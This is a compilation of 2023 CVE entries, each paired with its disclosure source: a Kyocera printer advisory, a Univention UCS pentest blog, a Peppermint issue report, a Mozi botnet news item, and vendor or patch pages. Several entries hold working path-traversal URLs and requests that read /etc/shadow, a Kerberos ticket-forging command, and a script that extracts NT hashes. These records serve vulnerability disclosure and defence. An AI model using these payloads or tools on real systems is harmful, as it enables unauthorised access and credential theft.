In Eclipse Glassfish 5 or 6, running with old versions of JDK (lower than 6u211, or < 7u201, or < 8u191), allows remote attackers to load malicious code on the server via access to insecure ORB listeners.


CVE-2023-5763: Eclipse GlassFish Security Guide, Release 7

Kyocera TASKalfa 4053ci printers through 2VG_S000.002.561 allow identification of valid user accounts via username enumeration because they lead to a "nicht einloggen" error rather than a falsch error.

**Full Disclosure mailing list archives****SEC Consult SA-20230705-0 :: Path traversal bypass & Denial of service in Kyocera TASKalfa 4053ci printer**

_From_: "SEC Consult Vulnerability Lab, Research via Fulldisclosure" <fulldisclosure () seclists org>  
_Date_: Wed, 5 Jul 2023 07:51:10 +0000  

SEC Consult Vulnerability Lab Security Advisory < 20230705-0 >
=======================================================================
               title: Path traversal bypass & Denial of service
             product: Kyocera TASKalfa 4053ci printer
  vulnerable version: TASKalfa 4053ci Version <= 2VG\_S000.002.561
       fixed version: 2VG\_S000.002.574
         CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261
              impact: High
            homepage: https://global.kyocera.com
               found: 2022-12-13
                  by: Stefan Michlits (Office Vienna)
                      Gorazd Jank (Office Vienna)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Kyocera Document Solutions is leading the digital shift driving productivity
and growth in the printing industry. We offer a range of exciting new options
that draw on the combined resources of the Kyocera Group."

Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/

Business recommendation:
------------------------
SEC Consult recommends Kyocera customers to install the latest updates.

Furthermore, an in-depth security analysis performed by security professionals
is highly advised, as the software may be affected from other security issues.


Vulnerability overview/description:
-----------------------------------
1) Path Traversal - Bypass (CVE-2023-34259)
A path traversal vulnerability was found by Hakan Eren ŞAN in 2020-06-06.
The previous exploit can be found at: https://www.exploit-db.com/exploits/48561
Kyocera has fixed the vulnerability. It was not possible to access arbitrary
files using the public exploit. However, SEC Consult have found a bypass to
exploit this vulnerability again and access arbitrary files. Due to the fact
that the web service is running as the user root, it was possible to access all
files (e.g. /etc/shadow) on the device.

2) Denial-of-Service - Web Interface (CVE-2023-34260)
The denial-of-service vulnerability is related to the path traversal
vulnerability. Instead of requesting a file, a directory will be requested.
Once the request is sent to the web service running on TCP port 443, the web
service will become unresponsive and must be restarted.

3) User Enumeration (CVE-2023-34261)
The login function on the web service running on TCP port 443 is prone to a
user enumeration vulnerability. The login function will return different
responses, whether the username is valid or not.


Proof of concept:
-----------------
1) Path Traversal - Bypass (CVE-2023-34259)
Previously, a security researcher has discovered an unauthenticated directory
traversal vulnerability in the web service running on port 443. The following
payload was used to access arbitrary files:

https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm

This vulnerability is fixed in the current version. It was not possible to
access arbitrary files using the above payload. However, the vulnerability was
not fixed correctly. SEC Consult identified a bypass to exploit this
vulnerability again.

Once the ../ sequences will be URL encoded, it is possible to bypass the fix
and access arbitrary files. The following payload can be used to access the
file /etc/passwd:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm

The response containing the contents of the file /etc/passwd can be seen
in the following paragraph.
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Length: 770
Accept-Encoding: identity
Server: KM-MFP-http/V0.0.1
Content-Type: text/html
X-Frame-Options: SAMEORIGIN

root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false
-------------------------------------------------------------------------------

Also, it was possible to access the file /etc/shadow. The following payload can
be used:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow%00index.htm

The output containing the content of the file /etc/shadow as it can be seen in
the following paragraph.
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Length: 401
Accept-Encoding: identity
Server: KM-MFP-http/V0.0.1
Content-Type: text/html
X-Frame-Options: SAMEORIGIN

root:$1$tfE2pkl/$O8uDq\*\*\*\*\*\*\*\*\*\*\*\*\*bSH.:11029::::::
daemon:\*:11029::::::
bin:\*:11029::::::
sys:\*:11029::::::
sync:\*:11029::::::
games:\*:11029::::::
man:\*:11029::::::
lp:\*:11029::::::
mail:\*:11029::::::
news:\*:11029::::::
uucp:\*:11029::::::
proxy:\*:11029::::::
www-data:\*:11029::::::
backup:\*:11029::::::
list:\*:11029::::::
irc:\*:11029::::::
gnats:\*:11029::::::
nobody:\*:11029::::::
sshd:x:11029::::::
-------------------------------------------------------------------------------
As the web service is running as the user root it was possible to access the
/etc/shadow file or the file has set the wrong permissions.

Based on previous security assessments of Kyocera printers, it is likely that
the service is running as the user root.


2) Denial-of-Service - Web Interface (CVE-2023-34260)
To trigger the DoS attack it is sufficient to navigate to the URL:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%00index.htm

Once the request is sent to the web service, the web service will become
unresponsive.

This attack is related to the path traversal vulnerability. The difference is
that in this case a folder is requested instead of a file. Apparently, this
leads to an error condition in the web server causing it to be unresponsive for
all users. Other applications offering a web interface (e.g., on port 8083)
seem to not be affected by the attack.


3) User Enumeration (CVE-2023-34261)
The user enumeration is located in the login functionality of the web
interface. Submitting an existing username will result in a different server
response than submitting an incorrect username. This enables attackers to
enumerate existing users by submitting potential usernames till a different
response is gathered. In this case, it does not matter whether the transmitted
password is correct or not. The gathered information could be used to better
search for default passwords or custom passwords inside of public password
leaks.
In case, the username does not exist, the response will return
"Login-Benutzername oder Passwort falsch.", on the other hand, if the
username exists the response contains "Sie können sich nicht einloggen."



Vulnerable / tested versions:
-----------------------------
The following product has been tested:
\* Kyocera TASKalfa 4053ci

All versions older than "2VG\_S000.002.561" are vulnerable according to the vendor.


Vendor contact timeline:
------------------------
2023-02-13: Asking for Kyocera KC-SIRT security contact through Nippon CSIRT
             Association; quick response: https://www.nca.gr.jp/member/kc-sirt.html
             (it seems only the Japanese website shows the email information)
2023-02-14: Contacting Kyocera KC-SIRT through kc-sirt () gp kyocera jp
2023-03-02: Contacting the vendor again, due to no response.
2023-03-06: Vendor response, KDC-PSIRT is responsible, requesting security advisory.
2023-03-13: Sending security advisory PGP-encrypted.
2023-04-19: Vendor response, vulnerabilities confirmed.
2023-05-19: Vendor response, the vulnerabilities were fixed. The patch will be
             released on 2023-05-26.
2023-05-22: Informing vendor that we will request CVE numbers, asking for
             information about affected & fixed version numbers.
2023-05-24: Vendor provides version information.
2023-06-02: Sending CVE numbers to vendor, asking for link to patch download.
2023-06-05: Vendor provides download information.
2023-07-05: Public release of security advisory.


Solution:
---------
The vendor provided the following download information:

There are two ways to update the firmware of our products.
\* One is to contact the shop of purchase and update the firmware from a service person.
\* The other is to use the Firmware Upgrade tool. From the Kyocera Document Solutions
   Global website in your country, you can download this tool and latest firmware.
   Then you update the firmware yourself.
   See: https://www.kyoceradocumentsolutions.com/download/ and choose "TASKalfa4053ci"


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec\_consult

EOF S. Michlits, G. Jank / @2023
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **SEC Consult SA-20230705-0 :: Path traversal bypass & Denial of service in Kyocera TASKalfa 4053ci printer** _SEC Consult Vulnerability Lab, Research via Fulldisclosure (Jul 07)_

CVE-2023-34261: Path traversal bypass & Denial of service in Kyocera TASKalfa 4053ci printer

The unexpected drop in malicious activity connected with the Mozi botnet in August 2023 was due to a kill switch that was distributed to the bots.
"First, the drop manifested in India on August 8," ESET said in an analysis published this week. "A week later, on August 16, the same thing happened in China. While the mysterious control payload – aka kill switch – stripped Mozi bots of most

The unexpected drop in malicious activity connected with the Mozi botnet in August 2023 was due to a kill switch that was distributed to the bots.

"First, the drop manifested in India on August 8," ESET said in an analysis published this week. "A week later, on August 16, the same thing happened in China. While the mysterious control payload – aka kill switch – stripped Mozi bots of most functionality, they maintained persistence."

Mozi is an Internet of Things (IoT) botnet that emerged from the source code of several known malware families, such as Gafgyt, Mirai, and IoT Reaper. First spotted in 2019, it's known to exploit weak and default remote access passwords as well as unpatched security vulnerabilities for initial access.

In September 2021, researchers from cybersecurity firm Netlab disclosed the arrest of the botnet operators by Chinese authorities.

But the precipitous decline in Mozi activity – from around 13,300 hosts on August 7 to 3,500 on August 10 – is said to be the result of an unknown actor transmitting a command instructing the bots to download and install an update designed to neutralize the malware.

Shadowserver Foundation

Specifically, the kill switch demonstrated capabilities to terminate the malware's process, disable system services such as SSHD and Dropbear, and ultimately replace Mozi with itself.

"Despite the drastic reduction in functionality, Mozi bots have maintained persistence, indicating a deliberate and calculated takedown," security researchers Ivan Bešina, Michal Škuta, and Miloš Čermák said.

A second variant of the control payload came fitted with minor changes, including a feature to ping a remote server, likely for statistical purposes. What's more, the kill switch exhibits a strong overlap with the botnet's original source code and is signed with the correct private key previously used by the original Mozi operators.

"There are two potential instigators for this takedown: the original Mozi botnet creator or Chinese law enforcement, perhaps enlisting or forcing the cooperation of the original actor or actors," Bešina said.

"The sequential targeting of India and then China suggests that the takedown was carried out deliberately, with one country targeted first and the other a week later."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Mysterious Kill Switch Disrupts Mozi IoT Botnet Operations

Archive, check and export commands in Chef InSpec
prior to 4.56.58 and 5.22.29 allow local command execution via maliciously
crafted profile.





CVE-2023-42658: InSpec CLI

An issue in Univention UCS v.5.0 allows a local attacker to execute arbitrary code and gain privileges via the check_univention_joinstatus function.

**Table of Contents**

1.  Introduction
2.  The Basics
3.  Exploitation via LDAP
4.  Exploitation via SSH/Kerberos
5.  Exploitation via Hash Cracking
6.  The Fix
7.  Lessons Learned
8.  Disclosure Timeline
9.  Update history

**Introduction**

Recently, DriveByte was assigned to perform a penetration test for a customer. The goal was to find as many vulnerabilities as possible, as well as to determine, if an attacker would be able to compromise the customer’s infrastructure. The unusual part about it? The customer’s IT had no Microsoft Active Directory nor Entra ID but something similar. It was based on a product called Univention UCS, which is according to their website, a solution for "easy and centralized administration of domains". This was especially interesting for us, as we did not know this solution before and are of course always genuinely interested in digging into new technologies. The following blogpost shows a very classic and simple flaw, that had a huge impact on the customer's environment.

Since the initial publication of this blogpost, some changes have been made. This includes especially some additional information that we received from univention. For better tracking we added a section "Update History". Special thanks again to Univention for the awesome information and collaboration!

**TLDR:**

By spying on the process creation of a UCS connected server with extensive permissions, it was possible to gather a large amount of LDAP data. This data includes different credentials and other authentication information. The vendor responded extremely professional and fixed the issues very quickly. He did not only fix the script where we found the issue, but also checked their code base for similar problems and fixed them as well.

**Do the basics. They might reward you with some quick wins!**

The vulnerability analysis was performed with access to the customer’s network and a user with very limited permissions (domain joined, but nothing else). While enumerating the network, we found that it is possible to access several servers with our basic user via SSH (remember, the network is mainly based on Linux machines, with only a very small number of Windows and Mac machines). This was possible due to faulty configured permissions and is not a default setting or problem of Univention UCS, but a configuration error. We know this kind of misconfigurations from Windows Active Directory environments, where we often see permissions for "authenticated users" for SMB, RDP and so on.

Of course, this was a very easy entry point and we started to dig into the machines to see if there is anything juicy to be found. Before trying to escalate privileges, we first checked for secrets and so on. Also, for chances of a quick win, we usually start monitoring process creations, to check for privilege escalation opportunities and other valuable information (hell yeah, full HackTheBox/OSCP style!!!). By searching through the system, we discovered the files /etc/ldap.secret and /etc/machine.secret. This sounded like relevant information. Sadly, we couldn’t read the files, as they were set to read/write-only by root. Also, we didn't know what they are used for, but suspected them to be part of the Univention software. A quick search through the extensive Univention documentation proved this assumption right. After publishing this blogpost, Univention contacted us again and hinted us to this discussion about a solution for the machine.secret and ldap.secretfiles. As they identified this files as a possible attack surface, they are planning to find another solution for this. So a solution is in the making.

We played around a little with some of the Univention scripts etc., but at first did not find anything that seemed promising. So, the next step was to check for privilege escalation. Next to other approaches, we went back to the process creation monitoring, and there it was:

The script check_univention_joinstatus requested the LDAP database as the system account, presenting the password in cleartext. We suspected that this might be the password from the /etc/machine.secret file which was later confirmed. So, the logical next step for us was to recreate this exact command from our attacker machine. We were quite surprised to see, that this machine had permissions to basically perform DCSync. It's not Windows AD of course. The machine had the permission to retrieve ALL directory objects _with all their attributes_. This includes users, with their krb5key, sambaNTPassword (NTHash), SHA512 or bcrypt hashes (SHA512 is the default) as well as their password history. The following screenshot shows the output we recreated in a lab environment:

However, this is only possible if the domain joined system has the permissions that match DCSync. In our test environment we joined an arbitrary machine to the domain and checked what information we get back from the "Domain Controller". So, in comparison to the information above, you can see in the screenshot below what information a usual domain joined system gets:

**Exploitation attempt 1: LDAP**

To exploit this issue, we can rely on n00py's awesome "Alternative ways to Pass the Hash (PtH)" blogpost. However, a bit more research on that topic showed, that it is not as simple as we first thought. Our first guess was, that we can just use the LDAP3 Python module to connect to LDAP with the NTLM hash. Unfortunately, that seems to be impossible with Univention, as it is not supporting NTLM authentication for LDAP:

While our first impression was, that we are doing something wrong, this GitHub entry stated that the "authMethodNotSupported" message is from the server. It seems that Univention does not have NTLM authentication activated on the server by default (atm, we don't know if it is supported at all).

For comparison, the SIMPLE authentication via LDAP is working fine:

But the 'server.info' output is puzzling us a bit because it says that NTLM is a valid SASL mechanism, so maybe there is a workaround by using NTLM for SASL. Before going too deep into that path and losing a lot of time, we decided to try something else. Maybe this motivates somebody who has more knowledge in this area to dig into it. Or maybe we will come back to this later...

Here we also got some additional information from Univention. NTLM is indeed not supported. The fact that it is still shown as supported sasl mechanism is due to the OpenLDAP defaulf configuration. Univention is tracking this issue here.

**Exploitation attempt 2: SSH via Kerberos**

As an alternative way, \\@n00py suggests in his blogpost to use the NThash to sign a Kerberos ticket and then connect via SSH. Well, that seems easy. So we took the administrator's hash and threw it in Impacket's ticketer.py. All information for this including the domain-sid etc. was included in the full domain dump.

    ticketer.py -nthash 3B0E04870F352EDC0EF120F16431FA42 -domain-sid S-1-5-21-2228799870-4051273110-1256914315 -spn host/ucs-7427.drivebytetest.intranet -domain drivebytetest.intranet Administrator

Sadly, the authentication failed with the following message:

As this is no traditional AD, we were thinking that they could use another approach to sign their Kerberos tickets. What was bugging us from the start was the krb5Key fields we've seen in the second screenshot. And again, the Univention documentation comes to our rescue. It states that "The krb5Key attribute stores the Kerberos password". Nice. But how?

After googling for a while, we came across this post in the Univention help forum. It contains some very interesting information. First, the krb5Key seems to consist of a keytype, a keyblock, in one case even an NThash and a salt string. Well, now of course we wanted to get our fingers on this s4search-decode script that was mentioned in this help request. We did not find it. It wasn’t on the domain controller and we didn't find it in the Univention Git repo (but maybe we just went over it???, there are tons of mentions, but we didn't find the actual script <- The awesome people from univention pointed us to this. So yeah. We were indeed just not finding it somehow). At that point a friend with whom we discussed the topic pointed us to the following page https://docs.software-univention.de/ucs-python-api/\_modules/univention/s4connector/s4/password.html. This file can also be found in the Univention Git. He pointed this out to us because of the following function:

    ...
    def extract_NThash_from_krb5key(ucs_krb5key):
    
        NThash = None
    
        for k in ucs_krb5key:
            (keyblock, salt, kvno) = heimdal.asn1_decode_key(k)
    
            enctype = keyblock.keytype()
            enctype_id = enctype.toint()
            if enctype_id == 23:
                krb5_arcfour_hmac_md5 = keyblock.keyvalue()
                NThash = binascii.b2a_hex(krb5_arcfour_hmac_md5)
                break
    
        return NThash
    
    ...

Nice. This seemed promising with only one downside; The dependency on heimdal which looked like a Univention-specific library version. We quickly recognized that this lib is installed on the Univention DC. But we didn't want to rely on that for executing the script. After a bit of searching we found a download portal which offered a Debian package and the source code etc. The package requires python below 3.8 and some other dependencies, but nothing too special. So we spun up a docker container to go on with the testing (The Dockerfile and final script can be found on our GitHub). We extracted the function, added only the important imports, and fired it up in iPython... and failed:

It seems that the krb5Key usually is not base64 encoded when passed to the function. But after modifying this, we were still running into an error. We started to break down the steps and came out with the following working script, which does basically the same steps as the actual function.

    #!/usr/bin/python3
    # -*- coding: utf-8 -*-
    
    import binascii
    import heimdal
    import base64
    import argparse
    
    krb5_keytype__des_cbc_crc = 1
    krb5_keytype__des_cbc_md4 = 2
    krb5_keytype__des_cbc_md5 = 3
    krb5_keytype__des3_cbc_sha1 = 16
    krb5_keytype__aes128_cts_hmac_sha1_96 = 17
    krb5_keytype__aes256_cts_hmac_sha1_96 = 18
    krb5_keytype__arcfour_hmac_md5 = 23
    
    def extract_NThash_from_krb5key(ucs_krb5key):
    
        NThash = None
    
        keyblock,salt,kvno = heimdal.asn1_decode_key(base64.b64decode(ucs_krb5key))
    
        if keyblock.keytype().toint() == krb5_keytype__arcfour_hmac_md5:
            NThash = binascii.hexlify(keyblock.keyvalue()).decode('utf-8')
        else:
            print(f'Keytype is: ', keyblock.keytype().toint())
    
        return NThash
    
    
    def main():
        parser = argparse.ArgumentParser(
                prog='ProgramName',
                        description='Simple tool to extract ntlm hash out of the arcfour_hmac_md5 krb5key used by univention ucs')
        parser.add_argument('-d', help="put your base64 encoded krb5key value here", required=True)
        args = parser.parse_args()
        nt_hash = extract_NThash_from_krb5key(args.d)
        print("NThash: ",nt_hash)
    
    
    if __name__ == '__main__':
        main()

And this worked like a charm. It allows us to extract the NThash out of the krb5Key. Now we could take the krb5Key of the krbtgt account for example to forge a ticket as Administrator, which is the default "Domain Admin" in Univention UCS.

And that's it. We can now be everybody we want to be :blush:.

Maybe we can also use the other keyblock values to sign the TGTs somehow. But we didn't look into that so far.

**Exploitation attempt 3: Hash Cracking**

As we are in possession of the NThashes, we are also able to try password cracking quite efficiently. We confirmed that the sambaNTPassword represents the actual password. Using hashcat, some proper wordlists as well as some good rules, can open some more pathways.

Using those methods we were able to go from "any user in the directory" to "Administrator", the "Domain Admin" equivalent because of some very basic misconfigurations, a trivial but impactful bug and a recoverable password.

**The Fix**

The mitigation time and responses from Univention have been extraordinary. It was a pleasure to work with them, as the communication was fast, professional as well as solution-oriented! Special thanks for this awesome experience and awareness for security! Univention rated the bug with 7.9 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N)

CVE-2023-38994 was reserved by MITRE for this issue, but not released yet.

Fixed version: Univention UCS 5.0-4 Fix number: 1.0.2-4

**Lessons Learned**

*   Do not grant "everyone" or "authenticated users" permissions to any machine if possible (and we guess that’s possible in almost every scenario)
*   Upgrade your software
*   Set strong and unique passwords
*   For developers and admins: Avoid sensitive information in process creations (Univention added this to their developers security guidelines. Great Job!)

**Disclosure Timeline**

2023/07/17 - Bug Reported

2023/07/17 - Bug confirmed by Univention and opened in their Bugtracker

2023/07/17 - GitHub push to fix the Bug

2023/07/19 - Fix release in 1.0.2-4 Release Note

2023/07/19 - Fix release of similar issues in another script Release Note

**Update History**

*   2023/10/19 - Added advisory for developers and admins in Lesson Learned
*   2023/10/30 - Mentioning Updates in the introduction
*   2023/10/30 - Added information about the misconfiguration of the ssh permissions
*   2023/10/30 - Added the outlook on a solution for the machine.secret and ldap.secret files
*   2023/10/30 - Changed wording from "synced" to "requested"
*   2023/10/30 - Added additional information and bugtracker about NTLM
*   2023/10/30 - Added the link to the s4search-decode script
*   2023/10/30 - Updated "Lessons Learned" with the fact that univention updated their developers security guidelines
*   2023/10/30 - Added link to the bugtracker in the timeline

CVE-2023-38994: Simple yet effective. The story of some simple bugs that led to the complete compromise of a network

Thorn SFTP gateway 3.4.x before 3.4.4 uses Pivotal Spring Framework for Java deserialization of untrusted data, which is not supported by Pivotal, a related issue to CVE-2016-1000027. Also, within the specific context of Thorn SFTP gateway, this leads to remote code execution.

**Overview**

A security advisory CVE-2016-1000027 applies to recent versions of SFTP Gateway. A vulnerability in a dependency library exposes a way to perform remote code execution (RCE) against the web admin portal of SFTP Gateway.

We recommend that you take the following actions below.

**Check your version of SFTP Gateway**

This vulnerability only affects the following SFTP Gateway versions:

*   v3.4.0
*   v3.4.1
*   v3.4.2
*   v3.4.3

You can check the version of SFTP Gateway by scrolling to the footer of the web admin portal.

Alternatively, you can SSH into the VM and list the files in /opt/sftpgw/ which show the version in the file names.

**Restrict port 443 to sysadmin IP addresses only**

The web admin portal of SFTP Gateway should already be locked down to sysadmin IP addresses only, if configured according to our guidelines.

Take some time now to verify your network ingress rules on port 443, and make sure it is **NOT** open to the world. For example, remove any rules for HTTPS 443 that allow the range 0.0.0.0/0.

Also, update your existing port 443 rules to remove any stale entries.

**Perform an in-place upgrade to version 3.4.4**

The easiest way to upgrade would be to use our in-place upgrade script.

**Note**: you must already be on SFTP Gateway version 3 in order to perform an in-place upgrade.

**Migrate to version 3.4.4**

The safest way to perform an upgrade is to perform a migration.

This entails exporting a backup of your existing server, and importing the backup into a new instance of v3.4.4. Finally, perform an IP or DNS cutover to the new server.

**Contact Support**

If you run into any issues, you can reach out to us via email at support@thorntech.com.

CVE-2023-47174: Java Deserialization RCE · SFTP Gateway Support

Peppermint Ticket Management through 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/ticket/1/file/download?filepath=../ POST request.

**Description**

When downloading a file attached to a ticket, it was observed to be able to download arbitrary files off the web server due to the filepath query parameter not being validated and passed directly to fs.createReadStream. Instructions to download and run the latest release were followed from here: https://github.com/Peppermint-Lab/peppermint/tree/master#-installation-with-docker

**Steps to Reproduce**

1.  Login to the application.
2.  Create a new ticket.
3.  Upload a file.
4.  Download the file and intercept the request in Burp Suite.
5.  Change the filepath parameter to "../../../../../../etc/shadow" or "../../../../../../etc/passwd" or "./.env"

**Proof of Concept Request and Response**

Request:

    POST /api/v1/ticket/1/file/download?filepath=../../../../../../etc/shadow HTTP/1.1
    Host: localhost:5000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.00) Gecko/20100101 Firefox/118.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: http://localhost:5000/ticket/1
    Content-Type: multipart/form-data; boundary=---------------------------9995410711832151211174726991
    Content-Length: 61
    Origin: http://localhost:5000
    Connection: close
    Cookie: token=<omitted>
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------9995410711832151211174726991--
    
    

Response:

    HTTP/1.1 200 OK
    Date: Sat, 14 Oct 2023 23:28:05 GMT
    Connection: close
    Content-Length: 476
    
    root:!::0:::::
    bin:!::0:::::
    daemon:!::0:::::
    adm:!::0:::::
    lp:!::0:::::
    sync:!::0:::::
    shutdown:!::0:::::
    halt:!::0:::::
    mail:!::0:::::
    news:!::0:::::
    uucp:!::0:::::
    operator:!::0:::::
    man:!::0:::::
    postmaster:!::0:::::
    cron:!::0:::::
    ftp:!::0:::::
    sshd:!::0:::::
    at:!::0:::::
    squid:!::0:::::
    xfs:!::0:::::
    games:!::0:::::
    cyrus:!::0:::::
    vpopmail:!::0:::::
    ntp:!::0:::::
    smmsp:!::0:::::
    guest:!::0:::::
    nobody:!::0:::::
    node:!:<omitted for security>
    nextjs:!:<omitted for security>
    

**Impact**

Allowing users to download system files, such as /etc/passwd, /etc/shadow, configuration files, application source code, and other users files. The etc/shadow file and .env file were able to be retrieved through the app.

**References**

https://cwe.mitre.org/data/definitions/22.html  
https://portswigger.net/web-security/file-path-traversal

CVE-2023-46864: Path Traversal - Arbitrary File Download · Issue #171 · Peppermint-Lab/peppermint


When the isula cp command is used to copy files from a container to a host machine and the container is controlled by an attacker, the attacker can escape the container.



627 **add bind mount file lock**

已合并

zhongtao:20.03-lts-sp1 src-openEuler:openEuler-20.03-LTS-SP1

 zhongtao 创建于 2023-09-19 15:07

克隆/下载

HTTPS SSH

复制

下载 Email Patch 下载 Diff 文件

add bind mount file lock

相关issue：#I82QEQ:在链接 glibc库场景下，当nsswitch工具动态加载一个包含容器内容的chroot库时，代码注入可能会发生。

怎样手动合并此 Pull Request

git checkout openEuler-20.03-LTS-SP1

git pull https://gitee.com/taotao-sauce/src-iSulad.git 20.03-lts-sp1

git push origin openEuler-20.03-LTS-SP1

评论 30 提交 1 文件 2 代码问题 0

展开设置 折叠设置

审查

审查人员

haomintsai

caihaomin

JingWoo

jingwoo

haozi007

duguhaotian

jingxiaolu

jingxiaolu

未设置

最少人数

0

测试

haomintsai

caihaomin

JingWoo

jingwoo

haozi007

duguhaotian

jingxiaolu

jingxiaolu

未设置

最少人数

0

优先级

不指定

严重

主要

次要

不重要

标签

openeuler-cla/yes

ci\_successful

sig/iSulad

关联 Issue

I82QEQ

在链接 glibc库场景下，当nsswitch工具动态加载一个包含容器内容的chroot库时，代码注入可能会发生。

Pull Request 合并后将关闭上述关联 Issue

里程碑

未关联

参与者 （3）

CVE-2021-33638: add bind mount file lock · Pull Request !627 · src-openEuler/iSulad - Gitee.com

iSulad uses the lcr+lxc runtime (default) to run malicious images, which can cause DOS.



251 **set env to avoid invoke lxc binary directly**

已合并

jake:jikai/set\_lxc\_memfd\_rexec src-openEuler:openEuler-22.03-LTS

jake 创建于 2023-09-18 19:25

克隆/下载

HTTPS SSH

复制

下载 Email Patch 下载 Diff 文件

#I842X9:CVE-2021-33634:CVE-2021-33634

怎样手动合并此 Pull Request

git checkout openEuler-22.03-LTS

git pull https://gitee.com/jikai11/src-openEuler-lcr.git jikai/set\_lxc\_memfd\_rexec

git push origin openEuler-22.03-LTS

评论 21 提交 1 文件 2 代码问题 0

展开设置 折叠设置

审查

审查人员

haomintsai

caihaomin

JingWoo

jingwoo

haozi007

duguhaotian

jingxiaolu

jingxiaolu

未设置

最少人数

0

测试

haomintsai

caihaomin

JingWoo

jingwoo

haozi007

duguhaotian

jingxiaolu

jingxiaolu

未设置

最少人数

0

优先级

不指定

严重

主要

次要

不重要

标签

openeuler-cla/yes

lgtm

ci\_successful

sig/iSulad

关联 Issue

I842X9

CVE-2021-33634

Pull Request 合并后将关闭上述关联 Issue

里程碑

未关联

参与者 （4）

CVE-2021-33634: set env to avoid invoke lxc binary directly · Pull Request !251 · src-openEuler/lcr - Gitee.com

An issue was discovered in Cassia Access Controller 2.1.1.2303271039. The Web SSH terminal endpoint (spawned console) can be accessed without authentication. Specifically, there is no session cookie validation on the Access Controller; instead, there is only Basic Authentication to the SSH console.

**CVE-2023-35794-WebSSH-Hijacking**

Repository contains description for CVE-2023-35794 discovered by Dodge Industrial Team for Dodge OPTIFY platfrom.

CVE ID: CVE-2023-35794  
Vendor: Cassia Networks  
Product: Access Controller  
Version: Cassia-AC-2.1.1.2303271039

Vulnerability: Incorrect Access Control  
Affected: web ssh, gateways  
Decription: WebSSH session can be hijacked  
Status: Confirmed by vendor, Fixed  
Version Patched: Cassia-AC-2.1.1.2308181707

**Details**

Cassia uses WebSSH2 by billchurch to initiate SSH sessions from AC to Gateways. WebSSH2 Is a web SSH Client which uses ssh2, socket.io, xterm.js, and express. A bare bones example of an HTML5 web-based terminal emulator and SSH client. It uses SSH2 as a client on a host to proxy a Websocket/Socket.io connection to a SSH2 server.

When a session of WebSSH is established with Gateway Device any external user can hijack it without any authentication and authorization.

